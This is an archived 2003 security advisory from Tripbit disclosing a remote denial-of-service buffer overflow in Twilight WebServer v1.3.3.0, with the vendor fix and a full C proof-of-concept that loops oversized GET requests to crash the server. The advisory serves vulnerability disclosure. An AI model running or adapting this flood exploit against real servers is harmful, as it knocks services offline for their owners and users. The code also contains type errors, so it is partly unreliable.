|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0
Rushjo
tripbit.org
Date: Sun Jul 13 2003 - 14:38:01 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0
contributed by: rushjo
======================================================================================
Tripbit Security Advisory
TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0
======================================================================================
PROGRAM: Twilight WebServer v1.3.3.0
HOMEPAGE: http://www.twilightutilities.com
NOT VULNERABLE VERSIONS: v1.3.4.0
RISK: Medium
IMPACT: Denial of Service Attack
RELEASE DATE: 2003-07
======================================================================================
TABLE OF CONTENTS
======================================================================================
1..........................................................DESCRIPTION
2..............................................................DETAILS
3..............................................................EXPLOIT
4............................................................SOLUTIONS
5........................................................VENDOR STATUS
6..............................................................CREDITS
7...........................................................DISCLAIMER
8...........................................................REFERENCES
9.............................................................FEEDBACK
1. DESCRIPTION
======================================================================================
"We are excited to present this completely new Modem Ready Internet Web Server
supporting these terrific features.
* Installs in seconds
* Lets you INSTANTLY share pictures and files
* Modem aware
* Automates telling friends and family when you start serving
* Automatically integrates your web camera
* Allows others to send files to you
* Automatically generates web pages
* Supports file resume
* A truely unique files-sharing tool"
(This description is taken from the website of Twilight Ultilities)
2. DETAILS
======================================================================================
¤ Remote DoS :
A security vulnerability in Twilight WebServer allows remote
attackers to crash the server by sending two an too long "get Request".
3. EXPLOIT
======================================================================================
This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability.
NOTE: This is only for INFORMATION purposes and not for any
destructive acts!
/****************************************************************************
* Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
* Author: posidron
*
* Date: 2003-07-07
* Reference: http://www.twilightutilities.com
* Version: Twilight Webserver v1.3.3.0
* Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*
* Exploit: twilight.c
* Compile: gcc twilight -o twilight
*
* Tripbit Security Development
*
* Contact
* [-] Mail: posidrontripbit.org
* [-] Web: http://www.tripbit.org
* [-] IRC: irc.euirc.net 6667 #tripbit
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41d780 in ?? ()
*****************************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd;
struct sockaddr_in srv;
struct hostent *host;
char send[1052], *flood[1037], get[3] = "GET", http[12] = "HTTP/1.0\r\n";
memset(flood, 0x41, 1037);
strncpy(send, get, sizeof(send) -1);
strncat(send, flood, sizeof(send) - strlen(send) -1);
strncat(send, http, sizeof(send) - strlen(send) -1);
if(argc < 3)
{
printf("Usage: %s [target] <port>\n", argv[0]);
exit(0);
}
if((host = gethostbyname(argv[1])) == NULL)
{
printf("Unknown host!\n");
exit(0);
}
srv.sin_family = AF_INET;
srv.sin_port = htons(atoi(argv[2]));
srv.sin_addr.s_addr = inet_addr((char*)argv[1]);
printf("DoS against Twilight Webserver v1.3.3.0\n");
for(;;)
{
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Can't start socket()!\n"); exit(0);
}
if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
{
printf("Connection to server broken!\n"); close(sockfd);
}
if(write(sockfd, send, strlen(send)) < 0)
{
break;
}
close(sockfd);
}
printf("Attack done!...\n");
return 0;
}
This error causes an "crash" of the Twilight WebServer v1.3.3.0.
4. SOLUTIONS
================================================================================
Upgrade your Twilight WebServer to the new fixed version v.1.3.4.0. This version
is avaible at http://www.twilightutilities.com.
5. VENDOR STATUS
================================================================================
The vendor has reportedly been notified. He didn't answer to your report but
NOW there is an new fixed version avaible for download.
6. CREDITS
================================================================================
Discovered by posidron
7. DISLAIMER
======================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
8. REFERENCES
======================================================================
- Original Version:
http://www.tripbit.org
9. FEEDBACK
======================================================================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory
http://www.tripbit.org
rushjotripbit.org
posidrontripbit.org
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]